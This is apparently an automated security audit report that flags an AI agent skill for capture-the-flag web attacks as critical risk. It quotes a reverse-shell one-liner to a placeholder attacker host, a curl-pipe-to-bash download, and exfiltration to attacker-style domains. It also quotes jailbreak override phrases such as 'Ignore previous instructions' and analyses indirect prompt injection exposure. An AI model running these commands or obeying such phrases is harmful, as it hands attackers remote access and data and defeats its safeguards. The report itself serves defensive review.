ctf-web-methodology

Fail

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: CRITICAL
PROMPT_INJECTION, REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, DATA_EXFILTRATION, EXTERNAL_DOWNLOADS
Full Analysis
  • [PROMPT_INJECTION]: The skill contains extensive documentation and examples of AI jailbreak techniques, including prompts to override system instructions, disable personas, and extract system prompts (found in references/auth-and-access.md and references/field-notes.md). These patterns, such as 'Ignore previous instructions' and 'System Override', pose a risk to the agent's own stability and safety filters if not handled in a strictly sandboxed context.
  • [REMOTE_CODE_EXECUTION]: Multiple files contain functional code and payloads for achieving remote code execution. Notably, references/server-side-advanced-2.md contains a complete Python script for a 'Rogue MySQL Server' designed to steal files via the LOAD DATA LOCAL protocol, which was flagged as a Trojan by antivirus scanners. Other files provide payloads for Java and Python deserialization vulnerabilities.
  • [COMMAND_EXECUTION]: The skill provides numerous payloads for shell command execution across different platforms and languages. references/server-side-deser.md and references/field-notes.md include active reverse shell patterns (e.g., bash -i >& /dev/tcp/ATTACKER/4444 0>&1) designed to grant remote access to an attacker.
  • [DATA_EXFILTRATION]: The methodology describes several techniques for exfiltrating sensitive data to external domains such as webhook.site and attacker.com via HTTP requests, DNS queries, and custom response headers (found in references/server-side-exec.md, references/auth-and-access.md, and references/flag-extraction.md).
  • [EXTERNAL_DOWNLOADS]: The skill includes instructions for downloading and executing remote scripts (e.g., curl http://attacker/shell.sh | bash in references/server-side-exec.md), which is a high-risk pattern for arbitrary code execution.
  • [INDIRECT_PROMPT_INJECTION]: The skill creates a high-risk surface for indirect prompt injection.
      • Ingestion points: The agent is instructed to use tools like http_request to fetch and analyze HTML, source code, and API responses from target websites (SKILL.md).
      • Capability inventory: The skill provides the agent with a vast array of powerful attack capabilities (RCE, file reading, network exfiltration).
      • Boundary markers: There are no instructions or delimiters provided to separate target-provided content from the agent's internal instructions.
      • Sanitization: There is no mention of sanitizing or validating external content before the agent uses it to make decisions or formulate new commands.
Recommendations
  • CRITICAL: 1 infected file(s) detected - DO NOT USE
  • AI detected serious security threats
Audit Metadata
  • Risk Level: CRITICAL
  • Analyzed: Apr 22, 2026, 07:58 AM